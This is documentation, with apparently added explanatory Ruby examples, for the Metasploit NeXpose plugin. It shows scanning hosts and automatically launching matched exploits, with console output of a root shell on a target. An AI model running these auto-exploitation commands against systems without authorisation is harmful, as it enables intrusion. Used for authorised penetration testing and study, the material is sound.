NeXpose Plugin

Starting with version 3.3.1, Metasploit can integrate with all editions of Rapid7 NeXpose, including the free Community Edition. The current functionality provides the ability to run NeXpose scans from the Metasploit console, cross-reference scan results with available Metasploit modules, and automatically launch the resulting exploits. The screen shot below shows an example of a basic automated scan + exploit session.

Table of Contents

  1. Introduction
  2. Quick Start Guide
  3. Discovery Mode
  4. Usage Guide

Implementation

This integration is in the form of a plugin that can be loaded into msfconsole (or msfweb). To use the nexpose plugin, an active database must be configured first. This can be accomplished using the db_create or db_connect commands, along with the db_driver command to set the database type. Once the database has been activated and the plugin loaded (load nexpose), a number of new commands become available in the console, all starting with the prefix nexpose_. Please see the usage guide below for more information on each command.

Known Issues

  • The NeXpose service only allows a single authenticated session per user. If the nexpose plugin is configured with one user account and the user logs into the NeXpose web interface, the session used by the nexpose plugin will be invalidated. This works both ways, as a login by the nexpose plugin will invalidate the web session for the same user account. For commercial NeXpose users, the solution is to create a dedicated user account for the nexpose plugin to use. For Community Edition users, only one user account is allowed, so care must be taken when logging into the web interface while the plugin is active.
  • NeXpose uses a self-signed SSL certificate by default. Although this can be easily changed by the user, the plugin handles this by accepting any invalid certificate from the server. This can present a security issue if an attacker can sit between the user and the NeXpose service. The nexpose plugin will warn the user and require additional input if a non-local (127.0.0.1) NeXpose service is used.
  • The plugin does not handle the case where NeXpose is running in diagnostic mode due to an incomplete installation or missing activation license. In this situation the plugin will return an error when the nexpose_connect command is executed.

Quick Start

  1. Install NeXpose following the guide on the NeXpose Community page.
  2. Download and install the latest version of Metasploit. You will need Metasploit 3.3.1 in order to integrate with NeXpose.
  3. Start NeXpose and then launch the Metasploit Console (msfconsole)
  4. Enable a database backend to store NeXpose scan results
    msf> db_create
    [*] The specified database already exists, connecting
    [*] Successfully connected to the database
    [*] File: /home/username/.msf3/sqlite3.db
    
  5. Load the NeXpose plugin
    msf> load nexpose
    [*] NeXpose integration has been activated
    [*] Successfully loaded plugin: nexpose
    
  6. Connect to the running NeXpose instance
    msf> nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
    [*] Connecting to NeXpose instance at 127.0.0.1:3780 with username <USERNAME>...
    
  7. Run a NeXpose scan and import the results
    msf > nexpose_scan 192.168.0.100
    [*] Scanning 1 addresses with template pentest-audit in sets of 32
    [*] Completed the scan of 1 addresses
    
  8. Cross-reference exploit modules with results
    msf > db_autopwn -t -x
    [*] Analysis completed in 1.6098849773407 seconds (5 vulns / 1777 refs)
    [*] Matched exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.100:80..
    
  9. Automatically launch exploit modules
    msf > db_autopwn -t -x -e -r
    

The last three steps can be combined into a single command:

msf > nexpose_scan -x 192.168.0.100
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
(module output)
[*] Command shell session 1 opened (192.168.0.X:6480 -> 192.168.0.100:2101)

Successful exploits result in Metasploit sessions:

msf > sessions -l -v
Active sessions
===============
  Id  Description    Tunnel                                   Via
  --  -----------    ------                                   ---
  1   Command shell  192.168.0.X:9885 -> 192.168.0.100:2104  linux/http/ddwrt_cgibin_exec

msf > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)

Discovery

One of the current limitations of the Community Edition of NeXpose is the lack of a Discovery license. This can be worked around by taking advantage of the NeXpose plugin's ability to use an existing Metasploit database of discovery results to launch NeXpose scans. In this scenario, the Metasploit database has been configured and another tool has been used to perform a discovery sweep of the target network. The example below demonstrates the use of Nmap to provide the initial discovery results. Since this example uses features of Nmap that require root or administrative privileges, the Metasploit console also needs to be launched as root for this particular example:

$ sudo msfconsole
msf> db_create myscan.db
msf> db_nmap -sP -PS22,25,53,80,113,179,443,500,1352,1720,1723,3780,4443,8080,8000 -PA20,53,80,113,443,10043 -PP -PE 192.168.0.0/24

At this point, the database contains a list of hosts as discovered by Nmap. We can now use the NeXpose plugin to automatically scan the hosts identified by Nmap.

msf> load nexpose
msf> nexpose_connect <USERNAME>:<PASSWORD>@127.0.0.1
msf> nexpose_scan -d

If we only want to scan a small subset of the hosts identified by Nmap, we can use the -I parameter to the nexpose_scan command:

msf> nexpose_scan -v -d -I 192.168.0.1-192.168.0.10
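An added Ruby example (not the plugin's own code) of what the -d and -I options do with hosts already sitting in the Metasploit database, and of the split into sets of 32 that nexpose_scan applies to any address range. DISCOVERED_HOSTS is a constructed stand-in for the hosts table that db_nmap would have filled.

```ruby
# Added example, not the plugin's own code: emulate what nexpose_scan -d -I
# does with hosts already in the Metasploit database, and the split into
# sets of 32 that nexpose_scan applies to any address range.
require 'ipaddr'

# Constructed stand-in for the hosts table that db_nmap would have filled.
DISCOVERED_HOSTS = %w[192.168.0.1 192.168.0.4 192.168.0.9 192.168.0.10
                      192.168.0.11 192.168.0.50 10.0.0.7].freeze

# "a.b.c.d-w.x.y.z", "a.b.c.d/nn" or a single address -> [low, high] IPAddr.
def parse_range(spec)
  if spec.include?('-')
    lo, hi = spec.split('-', 2).map { |s| IPAddr.new(s.strip) }
  else
    r = IPAddr.new(spec).to_range   # a CIDR or a single host; no iteration here
    lo, hi = r.begin, r.end
  end
  raise ArgumentError, "inverted range: #{spec}" if hi < lo
  [lo, hi]
end

# Expand a range argument into individual addresses.
def expand_range(spec)
  lo, hi = parse_range(spec)
  (lo..hi).map(&:to_s)
end

# nexpose_scan -d [-I range ...]: take the database hosts, keep those inside
# any -I range (all of them when none is given), sort numerically and cut
# into scan sets of +per_set+ addresses (the -n value, default 32).
def select_scan_sets(hosts, include: [], per_set: 32)
  ranges = include.map { |spec| parse_range(spec) }
  chosen = hosts.map { |h| IPAddr.new(h) }.select do |ip|
    ranges.empty? || ranges.any? { |lo, hi| ip >= lo && ip <= hi }
  end
  chosen.sort.map(&:to_s).each_slice(per_set).to_a
end
```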

Usage Guide

Once the plugin has been loaded, entering help into the console will show the following new commands:

nexpose_connect     Connect to a running NeXpose instance ( user:pass@host[:port] )
nexpose_activity    Display any active scan jobs on the NeXpose instance
nexpose_scan        Launch a NeXpose scan against a specific IP range and import the results
nexpose_disconnect  Disconnect from an active NeXpose instance
nexpose_discover    Launch a scan but only perform host and minimal service discovery
nexpose_dos         Launch a scan that includes checks that can crash services and devices (caution)
nexpose_exhaustive  Launch a scan covering all TCP ports and all authorized safe checks

nexpose_connect

The nexpose_connect command accepts a single argument that defines the username, password, host, and port number of the NeXpose scan engine to connect to. Only the username and password parameters are required; the host defaults to 127.0.0.1 and the port defaults to 3780. The syntax for the argument to this command is user:pass@host[:port]. Each of the following examples is correct:

The nexpose_connect command also accepts an alternate syntax for users with ":" or "@" in their password:
  • nexpose_connect admin s3r3tp@ss host port
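As an added example (not the plugin's own code), the following Ruby parses both argument forms described above, applies the 127.0.0.1 and 3780 defaults, and returns a flag for the non-loopback case that the Known Issues section says needs extra confirmation because the plugin accepts any server certificate.

```ruby
# Added example, not the plugin's own code: parse the argument forms that
# nexpose_connect accepts and flag the non-local-host case described above.
DEFAULT_HOST = '127.0.0.1'.freeze
DEFAULT_PORT = 3780

# args: the words typed after "nexpose_connect".  Returns a hash with
# :user, :pass, :host, :port and :warn_cert (true when the host is not
# loopback, since the plugin accepts any server certificate).
def parse_nexpose_connect(args)
  case args.length
  when 1
    # Compact form: user:pass@host[:port].  A password that itself contains
    # ':' or '@' is ambiguous here; that is what the word form below is for.
    user, rest = args[0].split(':', 2)
    raise ArgumentError, 'expected user:pass@host[:port]' if rest.nil? || user.empty?
    pass, _sep, hostport = rest.include?('@') ? rest.rpartition('@') : [rest, '', '']
    host, port = hostport.split(':', 2)
  when 2..4
    # Word form: user pass [host [port]]
    user, pass, host, port = args
  else
    raise ArgumentError, 'usage: user:pass@host[:port]  or  user pass [host [port]]'
  end
  raise ArgumentError, 'password is required' if pass.nil? || pass.empty?
  host = DEFAULT_HOST if host.nil? || host.empty?
  port = port.nil? || port.empty? ? DEFAULT_PORT : Integer(port, 10)
  raise ArgumentError, "port out of range: #{port}" unless (1..65_535).cover?(port)
  { user: user, pass: pass, host: host, port: port, warn_cert: host != DEFAULT_HOST }
end
```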

nexpose_activity

The nexpose_activity command will query the server for active scan jobs. This is an excellent way to determine if another scan is already running before using the nexpose_scan command.

nexpose_scan

The nexpose_scan command is the workhorse of the nexpose plugin. This command accepts a large number of options:

nexpose_scan -h
OPTIONS:
    -h        This help menu
    -n <opt>  The maximum number of IPs to scan at a time (default is 32)
    -s <opt>  The directory to store the raw XML files from the NeXpose instance (optional)
    -t <opt>  The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
    -v        Display diagnostic information about the scanning process
    -x        Automatically launch all exploits by matching reference after the scan completes (unsafe)
    -X        Automatically launch all exploits by matching reference and port after the scan completes (unsafe)
    -P        Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
   <Address Range> 

In the basic scenario of scanning a network range and importing the results, the usage would be:

msf> nexpose_scan 10.10.10.0/24

This would break the 256 IP range into 8 blocks of 32 IPs, scan each block, load the results, and discard the saved scan data on the NeXpose engine. Multiple IP ranges can be specified on the command-line, and users of the paid editions of NeXpose can specify a larger number of hosts to scan in parallel via the -n parameter. Paid users can also create custom scan templates, which can be specified via the -t parameter to nexpose_scan. Once the scan completes, the results are stored in the local Metasploit database, which is used by the db_autopwn command among others to automate exploitation. The -x parameter will perform a 1:1 cross-reference of Metasploit modules to NeXpose scan results, launching any relevant exploits. The -X parameter goes even further by launching all possible exploits that use the same port number as the ports open on the targets. The -X mode will launch exploits that may be missed in the standard vulnerability cross-reference due to a lack of a safe vulnerability check.
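An added Ruby example (not the plugin's or db_autopwn's own code, which works from the database) of the difference between -x and -X. The module catalogue and scan import are constructed: exploit/linux/http/ddwrt_cgibin_exec is the module named on this page, the two exploit/example/ modules and the REF-* reference ids are placeholders.

```ruby
# Added example, not the plugin's or db_autopwn's own code: the difference
# between -x (match by vulnerability reference) and -X (also match by open
# port).  Module and scan data are constructed; reference ids are placeholders.
MODULES = [
  { name: 'exploit/linux/http/ddwrt_cgibin_exec', refs: %w[REF-DDWRT], port: 80 },
  { name: 'exploit/example/other_http_service',   refs: %w[REF-OTHER], port: 80 },
  { name: 'exploit/example/some_ssh_flaw',        refs: %w[REF-SSH],   port: 22 },
].freeze

# What an imported NeXpose scan would contribute: open ports and the
# references of the vulnerabilities it actually verified on each host.
SCAN = {
  '192.168.0.100' => { ports: [22, 80], refs: %w[REF-DDWRT] },
  '192.168.0.101' => { ports: [80],     refs: [] },
}.freeze

# -x: a module is launched only against hosts where the scanner reported a
# vulnerability whose reference the module also carries.
def match_by_reference(scan, modules)
  scan.flat_map do |host, data|
    modules.select { |m| (m[:refs] & data[:refs]).any? }
           .map { |m| [m[:name], "#{host}:#{m[:port]}"] }
  end
end

# -X: additionally launch every module whose default port is open, whether
# or not any check confirmed the flaw (this is why the help marks it unsafe).
def match_by_port(scan, modules)
  scan.flat_map do |host, data|
    modules.select { |m| data[:ports].include?(m[:port]) }
           .map { |m| [m[:name], "#{host}:#{m[:port]}"] }
  end
end

def autopwn_targets(scan, modules, mode)
  by_ref = match_by_reference(scan, modules)
  mode == :X ? (by_ref | match_by_port(scan, modules)) : by_ref
end

# Launches that -X adds over -x: attempts with no verified vulnerability
# behind them, i.e. the extra noise, crash risk and log volume of that mode.
def unverified_launches(scan, modules)
  autopwn_targets(scan, modules, :X) - autopwn_targets(scan, modules, :x)
end
```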

nexpose_plugin.png (137.7 KB) HD Moore, 12/01/2009 08:13 am